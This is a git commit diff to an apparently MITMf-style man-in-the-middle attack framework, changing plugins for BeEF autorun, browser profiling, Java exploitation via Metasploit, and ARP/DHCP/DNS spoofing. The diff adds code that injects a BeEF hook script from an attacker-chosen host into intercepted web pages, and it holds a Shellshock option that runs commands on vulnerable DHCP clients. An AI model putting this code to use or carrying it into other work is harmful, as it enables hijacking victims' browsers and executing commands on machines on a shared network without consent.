fixed beefapi error, beefautorun now injects hook url and updated arguments, misc code style fixes

2025-07-06 21:12:16 -07:00 · 2014-10-17 21:07:28 +02:00 · 2014-10-17 21:07:28 +02:00 · ce91453436
commit ce91453436
parent 9ef85851a2
6 changed files with 31 additions and 16 deletions
--- a/2
+++ b/2
@ -1 +1 @@
-Subproject commit 20fe713d7818c60235ff65d8fc3988e4b464466c
+Subproject commit 815add35f7db409bbc9faed898765272b93092a2
--- a/plugins/BeefAutorun.py
+++ b/plugins/BeefAutorun.py
@ -1,4 +1,5 @@
 from plugins.plugin import Plugin
+from plugins.Inject import Inject
 from time import sleep
 import sys
 import json
@ -15,19 +16,21 @@ requests_log = logging.getLogger("requests")  #Disables "Starting new HTTP Conne
 requests_log.setLevel(logging.WARNING)


-class BeefAutorun(Plugin):
+class BeefAutorun(Inject, Plugin):
 	name = "BeEFAutorun"
 	optname = "beefauto"
 	has_opts = True
-	desc = "Autoruns BeEF modules based on Browser or OS type"
+	desc = "Injects BeEF hooks & autoruns modules based on Browser or OS type"

 	def initialize(self, options):
 		self.options = options
-		self.autoruncfg =  options.autoruncfg or "./config_files/beefautorun.cfg"
+		self.autoruncfg =  options.autoruncfg
+		self.hookip = options.hookip
 		self.beefip = options.beefip
 		self.beefport = options.beefport
 		self.beefuser = options.beefuser
 		self.beefpass = options.beefpass
+		self.dis_inject = options.dis_inject

 		beef = beefapi.BeefAPI({"host": self.beefip, "port": self.beefport})
 		if beef.login(self.beefuser, self.beefpass):
@ -41,6 +44,13 @@ class BeefAutorun(Plugin):
 		self.All_modules = userconfig["ALL"]
 		self.Targeted_modules = userconfig["targets"]

+		if self.dis_inject:
+			if not self.hookip:
+				sys.exit("[-] BeEFAutorun requires --hookip")
+			Inject.initialize(self, options)
+			self.count_limit = 1
+			self.html_payload = '<script type="text/javascript" src="http://%s:%s/hook.js"></script>' % (self.hookip, self.beefport)
+
 		print "[*] BeEFAutorun plugin online => Mode: %s" % self.Mode
 		t = threading.Thread(name="autorun", target=self.autorun, args=(beef,))
 		t.setDaemon(True)
@ -107,8 +117,10 @@ class BeefAutorun(Plugin):
 									sleep(0.5)

 	def add_options(self, options):
+		options.add_argument('--hookip', dest='hookip', help="Hook IP")
 		options.add_argument('--beefip', dest='beefip', default='127.0.0.1', help="IP of BeEF's server [default: localhost]")
 		options.add_argument('--beefport', dest='beefport', default='3000', help="Port of BeEF's server [default: 3000]")
 		options.add_argument('--beefuser', dest='beefuser', default='beef', help='Username for beef [default: beef]')
 		options.add_argument('--beefpass', dest='beefpass', default='beef', help='Password for beef [default: beef]')
-		options.add_argument('--autoruncfg', type=file, help='Specify a config file [default: beefautorun.cfg]')
+		options.add_argument('--autoruncfg', type=file, default="./config_files/beefautorun.cfg", help='Specify a config file [default: beefautorun.cfg]')
+		options.add_argument('--disable-inject', dest='dis_inject', action='store_true', default=True, help='Disables automatically injecting the hook url')
--- a/plugins/BrowserProfiler.py
+++ b/plugins/BrowserProfiler.py
@ -32,7 +32,7 @@ class BrowserProfiler(Inject, Plugin):
            if self.dic_output['plugin_list'] > 0:
                self.dic_output['plugin_list'] = self.dic_output['plugin_list'].split(',')
            pretty_output = pformat(self.dic_output)
-            logging.warning("%s >> Browser Profiler data:\n%s" % (request.client.getClientIP(), pretty_output))
+            logging.info("%s >> Browser Profiler data:\n%s" % (request.client.getClientIP(), pretty_output))

    def get_payload(self):
        payload = """<script type="text/javascript">
--- a/plugins/JavaPwn.py
+++ b/plugins/JavaPwn.py
@ -30,7 +30,7 @@ class JavaPwn(BrowserProfiler, Plugin):
        self.msfport = options.msfport
        self.rpcip = options.rpcip
        self.rpcpass = options.rpcpass
-        self.javapwncfg = options.javapwncfg or './config_files/javapwn.cfg'
+        self.javapwncfg = options.javapwncfg

        if not self.msfip:
            sys.exit('[-] JavaPwn plugin requires --msfip')
@ -182,7 +182,7 @@ class JavaPwn(BrowserProfiler, Plugin):
        options.add_argument('--msfport', dest='msfport', default='8080', help='Port of MSF web-server [default: 8080]')
        options.add_argument('--rpcip', dest='rpcip', default='127.0.0.1', help='IP of MSF MSGRPC server [default: localhost]')
        options.add_argument('--rpcpass', dest='rpcpass', default='abc123', help='Password for the MSF MSGRPC server [default: abc123]')
-        options.add_argument('--javapwncfg', type=file, help='Specify a config file [default: javapwn.cfg]')
+        options.add_argument('--javapwncfg', type=file, default="./config_files/javapwn.cfg", help='Specify a config file [default: javapwn.cfg]')

    def finish(self):
        '''This will be called when shutting down'''
--- a/plugins/Spoof.py
+++ b/plugins/Spoof.py
@ -36,11 +36,11 @@ class Spoof(Plugin):
        self.arp = options.arp
        self.icmp = options.icmp
        self.dns = options.dns
-        self.dnscfg = options.dnscfg or "./config_files/dns.cfg"
+        self.dnscfg = options.dnscfg
        self.dhcp = options.dhcp
-        self.dhcpcfg = options.dhcpcfg or "./config_files/dhcp.cfg" 
+        self.dhcpcfg = options.dhcpcfg 
        self.shellshock = options.shellshock
-        self.cmd = options.cmd or "echo 'pwned'"
+        self.cmd = options.cmd
        self.gateway = options.gateway
        #self.summary = options.summary
        self.target = options.target
@ -86,6 +86,9 @@ class Spoof(Plugin):

        elif self.dhcp:
            print "[*] DHCP Spoofing enabled"
+            if self.target:
+                sys.exit("[-] --target argument invalid when DCHP spoofing")
+
            self.rand_number = []
            self.dhcp_dic = {}
            self.dhcpcfg = ConfigObj(self.dhcpcfg)
@ -308,9 +311,9 @@ class Spoof(Plugin):
        group.add_argument('--dhcp', dest='dhcp', action='store_true', default=False, help='Redirect traffic using DHCP offers')
        options.add_argument('--dns', dest='dns', action='store_true', default=False, help='Modify intercepted DNS queries')
        options.add_argument('--shellshock', dest='shellshock', action='store_true', default=False, help='Trigger the Shellshock vuln when spoofing DHCP')
-        options.add_argument('--cmd', type=str, dest='cmd', help='Command to run on vulnerable clients [default: echo pwned]')
-        options.add_argument("--dnscfg", type=file, help="DNS tampering config file [default: dns.cfg]")
-        options.add_argument("--dhcpcfg", type=file, help="DHCP spoofing config file [default: dhcp.cfg]")
+        options.add_argument('--cmd', type=str, dest='cmd', default="echo 'pwned'", help='Command to run on vulnerable clients [default: echo pwned]')
+        options.add_argument("--dnscfg", type=file, default="./config_files/dns.cfg", help="DNS tampering config file [default: dns.cfg]")
+        options.add_argument("--dhcpcfg", type=file, default="./config_files/dhcp.cfg", help="DHCP spoofing config file [default: dhcp.cfg]")
        options.add_argument('--iface', dest='interface', help='Specify the interface to use')
        options.add_argument('--gateway', dest='gateway', help='Specify the gateway IP')
        options.add_argument('--target', dest='target', help='Specify a host to poison [default: subnet]')
@ -328,7 +331,7 @@ class Spoof(Plugin):
            print '\n[*] Flushing iptables'
            os.system('iptables -F && iptables -X && iptables -t nat -F && iptables -t nat -X')

-        if self.dns:
+        if (self.dns or self.hsts):
            self.q.unbind(socket.AF_INET)
            self.q.close()